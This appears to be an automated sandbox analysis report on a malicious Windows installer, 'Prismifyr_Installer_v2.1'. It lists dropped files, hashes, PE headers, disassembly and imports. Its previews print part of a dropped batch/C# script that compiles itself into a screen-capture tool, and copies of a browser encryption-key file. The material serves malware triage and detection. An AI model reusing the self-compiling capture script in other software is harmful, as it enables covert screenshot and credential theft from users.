                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L.6a..X2..X2..X2m.[3..X2m.]3..X2Z.]3+.X2Z.\3..X2Z.[3..X2m.\3..X2m.Y3..X2..Y2..X2..\3#.X2..]3..X2..X3..X2...2..X2...2..X2..Z3..X2Rich..X2........PE..L.....\...........!......................... ...............................@............@..........................6.......7..d................................E.....................................@............ ...............................text............................... ..`.rdata..8"... ...$..................@..@.data........P... ...6..............@....rsrc................V..............@..@.reloc...E.......F...Z..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                        File Type:MSVC .res
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1076
                                                                                                                                                                                                                        Entropy (8bit):4.218444908533655
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:A6F2D21624678F54A2ABED46E9F3AB17
                                                                                                                                                                                                                        SHA1:A2A6F07684C79719007D434CBD1CD2164565734A
                                                                                                                                                                                                                        SHA-256:AB96911D094B6070CBFB48E07407371DDB41B86E36628B6A10CDB11478192344
                                                                                                                                                                                                                        SHA-512:0B286DF41C3887EECFF5C38CBD6818078313B555EF001151B41AC11B80466B2F4F39DA518AB9C51EEFF35295CB39D52824DE13E026C35270917D7274F764C676
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.... ...........................t...<...............0...........t.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...P.....I.n.t.e.r.n.a.l.N.a.m.e...s.c.r.e.e.n.C.a.p.t.u.r.e._.1...3...2...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...X.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.c.r.e.e.n.C.a.p.t.u.r.e._.1...3...2...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...^...............................<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >. <asmv3:application>. <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">. <dpiAware>True/PM</dpiAw
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):350
                                                                                                                                                                                                                        Entropy (8bit):4.888222365859566
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:8951565428AA6644F1505EDB592AB38F
                                                                                                                                                                                                                        SHA1:9C4BEE78E7338F4F8B2C8B6C0E187F43CFE88BF2
                                                                                                                                                                                                                        SHA-256:8814DB9E125D0C2B7489F8C7C3E95ADF41F992D4397ED718BDA8573CB8FB0E83
                                                                                                                                                                                                                        SHA-512:7577BAD37B67BF13A0D7F9B8B7D6C077ECDFB81A5BEE94E06DC99E84CB20DB2D568F74D1BB2CEF906470B4F6859E00214BEACCA7D82E2B99126D27820BF3B8F5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >. <asmv3:application>. <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">. <dpiAware>True/PM</dpiAware>. </asmv3:windowsSettings>. </asmv3:application>.</assembly>
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):14246
                                                                                                                                                                                                                        Entropy (8bit):4.755441316440423
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:DA0F40D84D72AE3E9324AD9A040A2E58
                                                                                                                                                                                                                        SHA1:4CA7F6F90FB67DCE8470B67010AA19AA0FD6253F
                                                                                                                                                                                                                        SHA-256:818350A4FB4146072A25F0467C5C99571C854D58BEC30330E7DB343BCECA008B
                                                                                                                                                                                                                        SHA-512:30B7D4921F39C2601D94A3E3BB0E3BE79B4B7B505E52523D2562F2E2F32154D555A593DF87A71CDDB61B98403265F42E0D6705950B37A155DC1D64113C719FD9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:// 2>nul||@goto :batch./*.:batch.@echo off.setlocal enableDelayedExpansion..:: find csc.exe.set "csc=".for /r "%SystemRoot%\Microsoft.NET\Framework\" %%# in ("*csc.exe") do set "csc=%%#"..if not exist "%csc%" (. echo no .net framework installed. exit /b 10.)..if not exist "%~n0.exe" (. call %csc% /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"%~n0.exe" "%~dpsfnx0" || (. exit /b !errorlevel!. ).).%~n0.exe %*.endlocal & exit /b %errorlevel%..*/..// reference.// https://gallery.technet.microsoft.com/scriptcenter/eeff544a-f690-4f6b-a586-11eea6fc5eb8..using System;.using System.Runtime.InteropServices;.using System.Drawing;.using System.Drawing.Imaging;.using System.Collections.Generic;.using Microsoft.VisualBasic;..../// Provides functions to capture the entire screen, or a particular window, and save it to a file...public class ScreenCapture.{.. static String deviceName = "";. static Image capturedImage = null;.. /// Creates an Image obje
                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):12800
                                                                                                                                                                                                                        Entropy (8bit):4.691342927371462
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:18CDE4CFC9C121CC421152F9F86AED6B
                                                                                                                                                                                                                        SHA1:96ED7927ECC7A59B1E8B6C6051EB63D44C1C224B
                                                                                                                                                                                                                        SHA-256:315FE17CD584B553F73DE41E6DD6A009CF7A7ED82CD660D443AB76B42DADD4AE
                                                                                                                                                                                                                        SHA-512:FB9A4ABC70032E97148B225F543CF6D3E8CBD79D5545239B28E872330D559F13895E1CF9EE542D841CF1FE597BFC5C12EEEAA3668385FAB6ECE7D9607303A061
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5.g.................(..........>G... ...`....@.. ....................................@..................................F..W....`..x............................................................................ ............... ..H............text...D'... ...(.................. ..`.rsrc...x....`.......*..............@..@.reloc...............0..............@..B................ G......H........*...............................................................0............(....(.....+..*....0..L........~....r...po......-(.(.....~.........-..~.....+.r...p(.......(....(.....+..*.0..0.........(................(....&...(.......(....&..+..*.0.............{......{....Y...{......{....Y..(........(.......(..............{......{.... ...(....&...(....&.(....&.(.......(....&....+...*....0............(........o.....*...0............(........o.....*...0...........(......
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                        Size (bytes):186389504
                                                                                                                                                                                                                        Entropy (8bit):6.755948449281348
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:F90856B824B429A51D390C25F21C9683
                                                                                                                                                                                                                        SHA1:D0EDD6E25D5C7B50C320794C956AE63A0012620A
                                                                                                                                                                                                                        SHA-256:147327A853ADCEDDCF49A5CF07E7A727E87798F399E3AF5680909B640DE4DBE4
                                                                                                                                                                                                                        SHA-512:B51B39808E961EAC513CD42E3B5030F0BF3268DC91DE4B3CC17B8B7C1C38B214935783E02204EE3F5BAECA0037B16BC23DC26DDDB6D9F9B3A970DE092D6415F4
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."......f%......... C~........@............................. [...........`......................................... ........;..h.....H..........%I...........K.$&..............................(.....%.@...........0R.......b.......................text....e%......f%................. ..`.rdata........%......l%.............@..@.data.....H..0...>..................@....pdata...%I......&I..P..............@..@.gxfg....B....H..D...v..............@..@.retplne.....PH..........................rodata......`H..................... ..`.tls..........H.....................@...CPADinfo8.....H.....................@...LZMADEC.......H..................... ..`_RDATA........H.....................@..@malloc_h......H..................... ..`prot..........H.....................@..@.rsrc.........H.....................@..@.reloc..$&....K..(..................@..B................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):434
                                                                                                                                                                                                                        Entropy (8bit):5.684908476673266
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:D8C56FBC9A7AB67DE42D409FD61E44E3
                                                                                                                                                                                                                        SHA1:BA918BD4190B107ECC367F1B6273D4554484BA00
                                                                                                                                                                                                                        SHA-256:9ED07E74184B65EAC1E3167BC9BAD6E2963FBBD652690999A8BC36A1F4E74FD5
                                                                                                                                                                                                                        SHA-512:BE8EA669ED4873222D368494CE4B8934BE9BC99BC735BAF753C11D8E9D799D60DF4FFD7C8465663A7011932F64097D3F640C7AEB6CEC4D263301D1A2C5329DA1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:{"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACLBPAJBcDFQazCtpAIsNeNEAAAABIAAABDAGgAcgBvAG0AaQB1AG0AAAAQZgAAAAEAACAAAAA8cH63+ToCsNIqNYi0JXV2gxxhRdFN8L8vUJL/jyWl/QAAAAAOgAAAAAIAACAAAAAj4tVh9/nNcoB+FVGZ1KUGQz+fZ2ah+O48/QRf6mXU6zAAAABEWwY1yrXW1yMf2zV+6BVU/5IxqsPuFXaJZ21OaUJ+XTZEIYK9Ow8dWwbgR+hmjBdAAAAAllvUS1YjtyPjz7GLGhlbB/0/JZvXpVXpVsHim9LhYFKq/Mrv4j0nXtUye8rFvZw/SgzzlqwECK9FQXVfFey+3Q=="}}
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):434
                                                                                                                                                                                                                        Entropy (8bit):5.684908476673266
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:D8C56FBC9A7AB67DE42D409FD61E44E3
                                                                                                                                                                                                                        SHA1:BA918BD4190B107ECC367F1B6273D4554484BA00
                                                                                                                                                                                                                        SHA-256:9ED07E74184B65EAC1E3167BC9BAD6E2963FBBD652690999A8BC36A1F4E74FD5
                                                                                                                                                                                                                        SHA-512:BE8EA669ED4873222D368494CE4B8934BE9BC99BC735BAF753C11D8E9D799D60DF4FFD7C8465663A7011932F64097D3F640C7AEB6CEC4D263301D1A2C5329DA1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:{"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACLBPAJBcDFQazCtpAIsNeNEAAAABIAAABDAGgAcgBvAG0AaQB1AG0AAAAQZgAAAAEAACAAAAA8cH63+ToCsNIqNYi0JXV2gxxhRdFN8L8vUJL/jyWl/QAAAAAOgAAAAAIAACAAAAAj4tVh9/nNcoB+FVGZ1KUGQz+fZ2ah+O48/QRf6mXU6zAAAABEWwY1yrXW1yMf2zV+6BVU/5IxqsPuFXaJZ21OaUJ+XTZEIYK9Ow8dWwbgR+hmjBdAAAAAllvUS1YjtyPjz7GLGhlbB/0/JZvXpVXpVsHim9LhYFKq/Mrv4j0nXtUye8rFvZw/SgzzlqwECK9FQXVfFey+3Q=="}}
                                                                                                                                                                                                                        Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):93
                                                                                                                                                                                                                        Entropy (8bit):4.271218378323433
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:D097D4A505F65CC2EE9D32FD7FD41B9D
                                                                                                                                                                                                                        SHA1:219FE92E87A4735ED357B4930E6EEEB6C30FBEB6
                                                                                                                                                                                                                        SHA-256:718466249FB3C0CB0685D9AAD717FD4B6B0CE66A95ECE85CF1384E4B8CB7F21F
                                                                                                                                                                                                                        SHA-512:C2280016B7F27E28E0893B3E2AECCE764B54AB8CBB6BD5F50C8DD50955B48CEFE6C53575DEF33063B1CBC2EE8868C641DD86B1E86625ACED0AC5082C8E69B151
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:'//' is not recognized as an internal or external command,..operable program or batch file...
                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                        Entropy (8bit):7.9999911163798085
                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                        File name:Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File size:98'394'400 bytes
                                                                                                                                                                                                                        MD5:fe0ddf8159f4a56d194f90e1fb31f3b2
                                                                                                                                                                                                                        SHA1:adb5fcf6436b55cfd5391adc8e4d5725b2b1089b
                                                                                                                                                                                                                        SHA256:753581951adf2c71ae3ddcd51b5badda3e91f16aa32d09596d24fa5397451fc2
                                                                                                                                                                                                                        SHA512:9313e7f7102cb76ffc4a9d9a0f392b4301b1b855bc28f889500d98f7bbcbc69453b4b3bb3cd22a4a7eeeafb0c5ed856439eeddd17f37f0b5f48323e67ac2dd40
                                                                                                                                                                                                                        SSDEEP:1572864:ue/WnMbJr6Riuuogr2EgnzW/CKRa2mppLXAm28sas4LJnLWV5iB/LowOMhPMFCmk:uJM1r6R5i6E4zWI2mp1AYTTSuB/aMhP9
                                                                                                                                                                                                                        TLSH:2628333716C02974D4CC2F7AB6B4231B263D0FFFF9346C547A51A8E8054AFA62CD9589
                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................h...8...@.
                                                                                                                                                                                                                        Icon Hash:159633695d1b9563
                                                                                                                                                                                                                        Entrypoint:0x40338f
                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                        Time Stamp:0x5C157F86 [Sat Dec 15 22:26:14 2018 UTC]
                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                        Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                        sub esp, 000002D4h
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                        push 00000020h
                                                                                                                                                                                                                        pop edi
                                                                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                                                                        push 00008001h
                                                                                                                                                                                                                        mov dword ptr [esp+14h], ebx
                                                                                                                                                                                                                        mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                                                                                        mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                                                        call dword ptr [004080A8h]
                                                                                                                                                                                                                        call dword ptr [004080A4h]
                                                                                                                                                                                                                        and eax, BFFFFFFFh
                                                                                                                                                                                                                        cmp ax, 00000006h
                                                                                                                                                                                                                        mov dword ptr [0047AEECh], eax
                                                                                                                                                                                                                        je 00007FA8950F6963h
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        call 00007FA8950F9C15h
                                                                                                                                                                                                                        cmp eax, ebx
                                                                                                                                                                                                                        je 00007FA8950F6959h
                                                                                                                                                                                                                        push 00000C00h
                                                                                                                                                                                                                        call eax
                                                                                                                                                                                                                        mov esi, 004082B0h
                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                        call 00007FA8950F9B8Fh
                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                        call dword ptr [00408150h]
                                                                                                                                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                                                        cmp byte ptr [esi], 00000000h
                                                                                                                                                                                                                        jne 00007FA8950F693Ch
                                                                                                                                                                                                                        push 0000000Ah
                                                                                                                                                                                                                        call 00007FA8950F9BE8h
                                                                                                                                                                                                                        push 00000008h
                                                                                                                                                                                                                        call 00007FA8950F9BE1h
                                                                                                                                                                                                                        push 00000006h
                                                                                                                                                                                                                        mov dword ptr [0047AEE4h], eax
                                                                                                                                                                                                                        call 00007FA8950F9BD5h
                                                                                                                                                                                                                        cmp eax, ebx
                                                                                                                                                                                                                        je 00007FA8950F6961h
                                                                                                                                                                                                                        push 0000001Eh
                                                                                                                                                                                                                        call eax
                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                        je 00007FA8950F6959h
                                                                                                                                                                                                                        or byte ptr [0047AEEFh], 00000040h
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        call dword ptr [00408044h]
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        call dword ptr [004082A0h]
                                                                                                                                                                                                                        mov dword ptr [0047AFB8h], eax
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                                        push 000002B4h
                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        push 00440208h
                                                                                                                                                                                                                        call dword ptr [00408188h]
                                                                                                                                                                                                                        push 0040A2C8h
                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x19f0000x1a200.rsrc
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                        .text0x10000x66270x68007618d4c0cd8bb67ea9595b4266b3a91fFalse0.6646259014423077data6.450282348506287IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .rdata0x80000x14a20x1600eecac1fed9cc6b447d50940d178404d8False0.4405184659090909data5.025178929113415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .data0xa0000x70ff80x600db8f31a08a2242d80c29e1f9500c6527False0.5182291666666666data4.037117731448378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .ndata0x7b0000x1240000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .rsrc0x19f0000x1a2000x1a2001e425c651b7b1cf0b914100189aa0a1fFalse0.9367710825358851data7.871781011016036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                        RT_ICON0x19f4a80x17f76PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0003667257502598
                                                                                                                                                                                                                        RT_DIALOG0x1b74200x202dataEnglishUnited States0.4085603112840467
                                                                                                                                                                                                                        RT_DIALOG0x1b76280xf8dataEnglishUnited States0.6290322580645161
                                                                                                                                                                                                                        RT_DIALOG0x1b77200xeedataEnglishUnited States0.6260504201680672
                                                                                                                                                                                                                        RT_DIALOG0x1b78100x1fadataEnglishUnited States0.40118577075098816
                                                                                                                                                                                                                        RT_DIALOG0x1b7a100xf0dataEnglishUnited States0.6666666666666666
                                                                                                                                                                                                                        RT_DIALOG0x1b7b000xe6dataEnglishUnited States0.6565217391304348
                                                                                                                                                                                                                        RT_DIALOG0x1b7be80x1eedataEnglishUnited States0.38866396761133604
                                                                                                                                                                                                                        RT_DIALOG0x1b7dd80xe4dataEnglishUnited States0.6447368421052632
                                                                                                                                                                                                                        RT_DIALOG0x1b7ec00xdadataEnglishUnited States0.6422018348623854
                                                                                                                                                                                                                        RT_DIALOG0x1b7fa00x1eedataEnglishUnited States0.3866396761133603
                                                                                                                                                                                                                        RT_DIALOG0x1b81900xe4dataEnglishUnited States0.6359649122807017
                                                                                                                                                                                                                        RT_DIALOG0x1b82780xdadataEnglishUnited States0.6376146788990825
                                                                                                                                                                                                                        RT_DIALOG0x1b83580x1f2dataEnglishUnited States0.39759036144578314
                                                                                                                                                                                                                        RT_DIALOG0x1b85500xe8dataEnglishUnited States0.6508620689655172
                                                                                                                                                                                                                        RT_DIALOG0x1b86380xdedataEnglishUnited States0.6486486486486487
                                                                                                                                                                                                                        RT_DIALOG0x1b87180x202dataEnglishUnited States0.42217898832684825
                                                                                                                                                                                                                        RT_DIALOG0x1b89200xf8dataEnglishUnited States0.6653225806451613
                                                                                                                                                                                                                        RT_DIALOG0x1b8a180xeedataEnglishUnited States0.6512605042016807
                                                                                                                                                                                                                        RT_GROUP_ICON0x1b8b080x14Targa image data - Map 32 x 32630 x 1 +1EnglishUnited States1.05
                                                                                                                                                                                                                        RT_VERSION0x1b8b200x2b8COM executable for DOSEnglishUnited States0.40948275862068967
                                                                                                                                                                                                                        RT_MANIFEST0x1b8dd80x423XML 1.0 document, ASCII text, with very long lines (1059), with no line terminatorsEnglishUnited States0.5127478753541076
                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                        KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                                                                                                        USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                                                                                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
